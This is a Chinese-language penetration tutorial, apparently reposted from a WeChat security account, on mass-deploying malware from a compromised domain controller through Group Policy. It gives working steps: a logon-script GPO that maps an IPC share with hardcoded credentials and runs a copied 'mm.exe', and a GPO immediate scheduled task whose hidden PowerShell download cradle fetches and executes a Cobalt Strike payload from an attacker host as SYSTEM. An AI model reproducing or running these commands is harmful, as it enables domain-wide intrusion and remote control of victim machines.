域渗透 - 域控使用组策略下发文件并执行

本文将简单讲解在内网渗透中拿下域控的情况下，如何使用组策略批量下马。

利用前提：

拥有更改某组策略的权限或者域管权限

利用思路：

1、利用OU+启动脚本

2、利用计划任务

这里引用三好学生师傅的原话

根据不同情况，有以下两种利用思路：
1、新建组策略，创建计划任务实现远程执行
创建一个新的GPO并链接到对应的域备份GPO修改Backup.xml和gpreport.xml创建ScheduledTasks.xml还原GPO 强制客户端刷新策略清理操作痕迹第二步到第五步可以通过脚本直接实现2、修改已有组策略，替换计划任务
如果域控制器上已有策略并配置了计划任务不再需要注册，修改ScheduledTasks.xml就好

测试环境：

域控：windows server 2019

域成员机器：windows server 2016

攻击机：Kali Linux

测试工具：CobaltStrike 4.2

测试一

域成员登录时，执行域控提前部署好的bat脚本，通过此脚本，IPC连接到域控，copy文件或执行命令，在成员上执行。

首先新建OU：

然后在OU内新建用户：

然后打开组策略管理(gpmc.msc),右键组策略对象——新建

然后以此执行右键ADControl——编辑——用户配置——策略——windows设置——脚本——登录——显示文件——新建ADControl.bat

代码如下：

cmd /c calc

然后添加——浏览——选择ADControl.bat

然后右键OU——链接现有GPO——选择ADcontrol

然后刷新组策略

gpupdate /force

然后使用新建账户登录，成功执行calc

若是想要上马则利用IPC共享实现即可，代码如下

net use \192.168.2.100  p@ssw0rd /user:[email protected]copy \192.168.2.100c$testmm.exe c:testcmd /c c:testmm.exenet use * /del /y

或使用powershell上线

测试二

利用计划任务来实现

首先创建GPO

new-gpo -name TestGPO

链接GPO

New-GPLink -Name TestGPO -Target 'dc=ssosec,dc=com'

修改GPO并添加即时任务

即时任务会在组策略同步的时候强制执行一次，组策略每90分钟自动同步一次。使用三好学生的脚本

https://github.com/3gstudent/Homework-of-Powershell/blob/master/New-GPOImmediateTask.ps1

New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO -SysPath '\WIN-2EQKFR3L6MF.ssosec.comsysvolssosec.com' -Command 'powershell.exe' -CommandArguments '-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.1.106:8022/a''))"'

这里顺带提一嘴GPO的一些知识，GPO默认路径是在：

\ssosec.comsysvolSSOSec.comPolicies

{6AC1786C-016F-11D2-945F-00C04fB984F9}对应Default Domain Controllers Policy

{31B2F340-016D-11D2-945F-00C04FB984F9}对应Default Domain Policy

其他的则是你自己新建的，计划任务的配置文件放在如下的地方，就是图中的xml文件

然后客户机强制刷新组策略，目标上线，且是system

参考文章：

https://redn3ck.github.io/2018/03/01/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E6%8E%A7%E4%B8%8B%E5%8F%91%E6%96%87%E4%BB%B6%E5%B9%B6%E6%89%A7%E8%A1%8C%E8%BF%9C%E6%8E%A7/

https://blog.csdn.net/MS_Tony_Shu/article/details/93723432

https://blog.csdn.net/qq_41874930/article/details/108343156

https://3gstudent.github.io/backup-3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8GPO%E4%B8%AD%E7%9A%84%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C/

本文始发于微信公众号（鸿鹄实验室）：域渗透 - 域控使用组策略下发文件并执行